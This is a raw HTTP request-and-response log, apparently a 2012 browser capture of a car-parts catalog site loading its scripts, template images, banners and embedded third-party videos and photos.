User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 20:39:34 GMT
Etag: &quot;1009b17-88e2-4f8f2686&quot;
Accept-Ranges: bytes
Content-Length: 35042
Keep-Alive: timeout=15, max=96
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/assets/js/jquery-1.6.2.min.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 20:39:34 GMT
Etag: &quot;1009b04-165b4-4f8f2686&quot;
Accept-Ranges: bytes
Content-Length: 91572
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /hphotos-ak-prn1/563109_10150637732975885_111144240884_9314018_1486165874_n.jpg HTTP/1.1

Host: a1.sphotos.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.0 400 Bad Request

Content-Type: text/html
Server: AkamaiGHost
Mime-Version: 1.0
Content-Length: 307
Expires: Thu, 08 Nov 2012 02:26:11 GMT
Date: Thu, 08 Nov 2012 02:26:11 GMT
Connection: close
GET /hphotos-ak-ash3/546534_236676819764395_100002662352334_423845_552818728_n.jpg HTTP/1.1

Host: a6.sphotos.ak.fbcdn.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.0 400 Bad Request

Content-Type: text/html
Server: AkamaiGHost
Mime-Version: 1.0
Content-Length: 307
Expires: Thu, 08 Nov 2012 02:26:11 GMT
Date: Thu, 08 Nov 2012 02:26:11 GMT
Connection: close
GET /catalog/modules/mod_btslideshow/images/72/slideshow/jdmbannermotionautoshow.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Fri, 25 May 2012 01:49:47 GMT
Etag: &quot;1009ba2-3657b-4fbee53b&quot;
Accept-Ranges: bytes
Content-Length: 222587
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/slideshow/jdmsportkktnewsbanner.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 31 May 2012 03:18:40 GMT
Etag: &quot;1009baa-41303-4fc6e310&quot;
Accept-Ranges: bytes
Content-Length: 267011
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/assets/skitter/js/jquery.animate-colors-min.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 20:39:34 GMT
Etag: &quot;1009b15-6c8-4f8f2686&quot;
Accept-Ranges: bytes
Content-Length: 1736
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/assets/skitter/js/jquery.easing.1.3.min.js HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Wed, 18 Apr 2012 20:39:34 GMT
Etag: &quot;1009b16-e11-4f8f2686&quot;
Accept-Ranges: bytes
Content-Length: 3601
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/images/page_header_bg.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/layout.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005447-1b0-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 432
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/images/menu_level1_item.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/layout.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005418-27a-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 634
Keep-Alive: timeout=15, max=92
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/images/menu_level1_item_active_orange.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/menus.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005422-41e-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 1054
Keep-Alive: timeout=15, max=94
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/images/wrapper_shadows.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/layout.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005453-1d6-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 470
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
GET /photo/1280/jofeltolosa/20387828158/10/tumblr_m1vtlt3arW1qe7j3i HTTP/1.1

Host: www.tumblr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache
P3P: CP=&quot;ALL ADM DEV PSAi COM OUR OTRo STP IND ONL&quot;
Location: http://25.media.tumblr.com/tumblr_m1vtlt3arW1qe7j3io10_1280.jpg
Vary: Accept-Encoding
Content-Encoding: gzip
X-Tumblr-Usec: D=42371
Content-Length: 20
Connection: close
GET /photo/1280/jofeltolosa/20387828158/3/tumblr_m1vtlt3arW1qe7j3i HTTP/1.1

Host: www.tumblr.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 302 Found

Content-Type: text/html; charset=UTF-8
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache
P3P: CP=&quot;ALL ADM DEV PSAi COM OUR OTRo STP IND ONL&quot;
Location: http://25.media.tumblr.com/tumblr_m1vtlt3arW1qe7j3io3_1280.jpg
Vary: Accept-Encoding
Content-Encoding: gzip
X-Tumblr-Usec: D=44130
Content-Length: 20
Connection: close
GET /catalog/templates/yoo_crystal/images/wrapper_bg.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/layout.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005452-1ab-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 427
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/images/header.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/layout.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005414-479-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 1145
Keep-Alive: timeout=15, max=91
Connection: Keep-Alive
GET /catalog/templates/yoo_crystal/images/module_dotted.png HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/templates/yoo_crystal/css/modules.css
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 02:26:11 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Thu, 03 Feb 2011 18:18:43 GMT
Etag: &quot;1005426-e6-4d4af183&quot;
Accept-Ranges: bytes
Content-Length: 230
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
GET /catalog/modules/mod_btslideshow/images/72/slideshow/jdmbannerc.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: 5db4101b18faf2f3f59c10f162c39f19=6itg5hcj1t242ijm3kot4jpck5
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Thu, 08 Nov 2012 02:26:10 GMT
Server: Apache/1.3.42 (Unix) mod_auth_tkt/2.1.0 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8r
Last-Modified: Fri, 27 Apr 2012 00:16:59 GMT
Etag: &quot;1009b46-3f79e-4f99e57b&quot;
Accept-Ranges: bytes
Content-Length: 259998
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
GET /v/rmhEhQWemhY?version=3&hl=en_US&rel=0 HTTP/1.1

Host: www.youtube.com
GET /v/rmhEhQWemhY?version=3&amp;hl=en_US&amp;rel=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: VISITOR_INFO1_LIVE=TIoxcizkAQ0; hideBrowserUpgradeBox=True; PREF=fv=10.0.45&amp;f4=4000
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Date: Thu, 08 Nov 2012 02:26:12 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 4338
GET /v/utR5a04WeGM?version=3&hl=en_US&rel=0 HTTP/1.1

Host: www.youtube.com
GET /v/utR5a04WeGM?version=3&amp;hl=en_US&amp;rel=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: VISITOR_INFO1_LIVE=TIoxcizkAQ0; hideBrowserUpgradeBox=True; PREF=fv=10.0.45&amp;f4=4000
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Date: Thu, 08 Nov 2012 02:26:12 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 4317
GET /v/U9boP9RBDAM?version=3&hl=en_US&rel=0 HTTP/1.1

Host: www.youtube.com
GET /v/U9boP9RBDAM?version=3&amp;hl=en_US&amp;rel=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: VISITOR_INFO1_LIVE=TIoxcizkAQ0; hideBrowserUpgradeBox=True; PREF=fv=10.0.45&amp;f4=4000
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Date: Thu, 08 Nov 2012 02:26:12 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 4103
GET /v/NOACqDnrx0A?version=3&hl=en_US&rel=0 HTTP/1.1

Host: www.youtube.com
GET /v/NOACqDnrx0A?version=3&amp;hl=en_US&amp;rel=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
Cookie: VISITOR_INFO1_LIVE=TIoxcizkAQ0; hideBrowserUpgradeBox=True; PREF=fv=10.0.45&amp;f4=4000
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Date: Thu, 08 Nov 2012 02:26:12 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 4102
GET /socialnetworkmain/widgets/photo/slideshowplayer/slideshowplayer.swf?v=201202162027 HTTP/1.1

Host: static.ning.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Server: Ningtron/2000
X-XN-Trace-Token: 86f8b3bf-fdfc-4db0-bec2-2a0f2800c293
Content-Length: 66957
Last-Modified: Thu, 04 Oct 2012 21:07:34 GMT
Accept-Ranges: bytes
Cache-Control: max-age=674794
Expires: Thu, 15 Nov 2012 21:52:46 GMT
Date: Thu, 08 Nov 2012 02:26:12 GMT
Connection: keep-alive
GET /files/cv2zte0kJ97fGsLjnF3mcK1*gcqRAXjlUWYQdxkG5m6sAW086mmN2lLxDIJS3fasudhlqU1sHxqViSUjPmIhB*QJFgKgN9wU/FD18.jpg HTTP/1.1

Host: api.ning.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Ning HTTP Server 2.0
X-XN-Trace-Token: 88f39ca9-5808-4984-a199-9cdddcae5dd4
Last-Modified: Thu, 12 Apr 2012 02:23:21 GMT
Content-Length: 242135
Cache-Control: max-age=1129838
Expires: Wed, 21 Nov 2012 04:16:49 GMT
Date: Thu, 08 Nov 2012 02:26:11 GMT
Connection: keep-alive
GET /files/wziVhFX4fs2YMkHfVNNiSdI-hRDGQthhLG7W*I14ITi*NqWmoIw33u3eGp2etixbXMGaH*a9eSPLHkEaU36grrVNx18NMBu3/FD46.jpg HTTP/1.1

Host: api.ning.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Ning HTTP Server 2.0
X-XN-Trace-Token: 67438e07-c4d4-4ff4-88ed-9547fdce978a
Last-Modified: Thu, 12 Apr 2012 02:21:47 GMT
Content-Length: 264671
Cache-Control: max-age=1121002
Expires: Wed, 21 Nov 2012 01:49:33 GMT
Date: Thu, 08 Nov 2012 02:26:11 GMT
Connection: keep-alive
GET /files/JsSqNzv6*u0utBDTCLIL*1WDfZ3dY3KXefc2KlR8FnNsxhHK*b0FcF-5Hcoz4urbqBNjH5XYlbSI1UBtyh7kGeV9ISavc5Zj/FD38.jpg HTTP/1.1

Host: api.ning.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Ning HTTP Server 2.0
X-XN-Trace-Token: 26700038-e704-43a6-9d2b-7ef7d8d246ad
Last-Modified: Thu, 12 Apr 2012 02:25:14 GMT
Content-Length: 261994
Cache-Control: max-age=1697341
Expires: Tue, 27 Nov 2012 17:55:12 GMT
Date: Thu, 08 Nov 2012 02:26:11 GMT
Connection: keep-alive
GET /files/xrSNIL9syZ15rFOEpr96rEt1c*mpjmiOTdnPPmxkjHM3L9KSSc5BFeQac3j-MTQuitl9x*82AJNskd3HeCrrNUAMycnxjGeo/FD8.jpg HTTP/1.1

Host: api.ning.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Ning HTTP Server 2.0
X-XN-Trace-Token: 60007670-bd44-491e-b35c-41f8af51f3c6
Last-Modified: Thu, 12 Apr 2012 02:26:45 GMT
Content-Length: 205267
Cache-Control: max-age=1121214
Expires: Wed, 21 Nov 2012 01:53:05 GMT
Date: Thu, 08 Nov 2012 02:26:11 GMT
Connection: keep-alive
GET /moogaloop.swf?clip_id=36576436&server=vimeo.com&show_title=0&show_byline=0&show_portrait=0&color=00adef&fullscreen=1&autoplay=0&loop=0 HTTP/1.1

Host: vimeo.com
GET /moogaloop.swf?clip_id=36576436&amp;server=vimeo.com&amp;show_title=0&amp;show_byline=0&amp;show_portrait=0&amp;color=00adef&amp;fullscreen=1&amp;autoplay=0&amp;loop=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://jdmsport.com/catalog/
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Date: Thu, 08 Nov 2012 02:26:13 GMT
Server: Apache
Expires: Wed, 07 Nov 2012 14:26:13 GMT
X-Server: 10.90.128.68
X-UA-Compatible: IE=edge,chrome=1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 230
Connection: close
GET /catalog/modules/mod_btslideshow/images/72/slideshow/jdmslideshowturbokits.jpg HTTP/1.1

Host: jdmsport.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
